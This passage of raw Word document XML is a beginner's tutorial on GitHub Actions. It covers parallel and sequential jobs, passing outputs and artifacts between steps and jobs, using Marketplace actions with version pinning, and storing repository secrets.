        <w:t xml:space="preserve">workflow_call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — makes the workflow reusable from other workflows (more on this later)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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7. Jobs and steps — the shape of everything</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Two rules will take you most of the way:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs run in parallel by default.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a workflow has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">lint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, both run at the same time on separate runners. You don't have to do anything — parallelism is the default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A quick aside since these two names show up everywhere:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a static analysis step. It reads your code without running it and flags style problems, unused variables, unsafe patterns, missing types, and other things a careful human reviewer would catch. Common linters: ESLint (JavaScript / TypeScript), Pylint or Ruff (Python), golangci-lint (Go), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (C#), RuboCop (Ruby).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is your test suite — unit tests, integration tests, end-to-end tests. It actually runs your code and verifies it behaves the way it's supposed to. Common runners: Jest, Pytest, Go's built-in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">go test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, JUnit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Lint catches "this looks wrong." Test catches "this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrong." You usually want both, in parallel, on every PR.</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lint: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run lint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test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use `needs:` to run jobs in sequence.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echo "building"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echo "deploying"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> now waits for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> to succeed. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">That's the whole model. Everything complicated in workflows comes from combining these two rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sharing data between steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes one step generates a value that the next step needs. Steps can write to a special file called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">$GITHUB_OUTPUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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Generate version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id: version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echo "tag=v1.2.3" &gt;&gt; $GITHUB_OUTPUT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Use version</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echo "Tag is ${{ steps.version.outputs.tag }}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Note the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">id:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the first step — that's how the second step references it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sharing data between jobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs run on different runners, so they can't just read each other's files. Instead, upload an artifact in one job and download it in another:</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echo "result" &gt; output.txt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actions/upload-artifact@v4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my-output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 output.txt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use-it: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actions/download-artifact@v4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my-output</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cat output.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Artifacts stick around for 90 days by default. The four times you'll actually reach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Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>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Why artifacts fit</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Build job → deploy job</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Deploy needs the binary, but they run on different machines. Upload from build, download in deploy.</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Test job → coverage report</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You want the report viewable for 90 days without keeping the runner alive.</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Failed run debugging</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Upload everything in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">RUNNER_TEMP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on failure so you can download it after the run dies.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Passing data forward without a database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E.g., a build manifest, generated SQL migration files, screenshot diffs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also download artifacts from the Actions tab UI — handy when you want to grab a CI-built binary onto your laptop without rebuilding locally.</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8. Using other people's actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The Actions Marketplace is full of pre-built steps. You can browse it at </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rIdo1_iycwukyillpsgba5ct">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="2E75B6"/>
            <w:u w:val="single" w:color="2E75B6"/>
          </w:rPr>
          <w:t xml:space="preserve">github.com/marketplace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. These are the LEGO bricks of the GitHub Actions world, and most workflows are mostly made of them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How you call one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owner/repo@version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input-name: value</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The ones you'll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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>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What it does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actions/checkout@v4</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Clones your repo onto the runner. Almost every workflow needs it.</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actions/setup-node@v4</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Installs Node.js.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actions/setup-python@v5</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Installs Python.</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actions/setup-java@v4</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Installs Java.</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actions/cache@v4</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Caches files between runs (big speedup).</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actions/upload-artifact@v4</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Saves files from a run for later.</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actions/download-artifact@v4</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Grabs saved files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Pinning versions — and why it matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When you write </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">@v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, you get the latest release in the v4.x line. Convenient, but it means "the code you run tomorrow might not be the code you ran today."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Your options:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">@v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — latest in the v4 range. Fine for actions maintained by GitHub itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">@v4.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — an exact version. More stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">@&lt;commit-sha&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pinned to a specific commit. Most secure — no one can change what you run by pushing a new tag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">@main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — whatever is on the action's main branch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">right now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Please don't.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">For third-party actions, especially anything that handles secrets, pin to a commit SHA. It's the only way to guarantee the code doesn't change under you.</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9. Secrets and environment variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Never commit passwords, API keys, or tokens to your repo. This is the rule that doesn't bend. Secrets go in GitHub's secret storage, which encrypts them and redacts them from logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding a secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Repo → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets and variables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">New repository secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Give it a name and a value. That's it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using it in a workflow</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API_KEY: ${{ secrets.API_KEY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./deploy.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
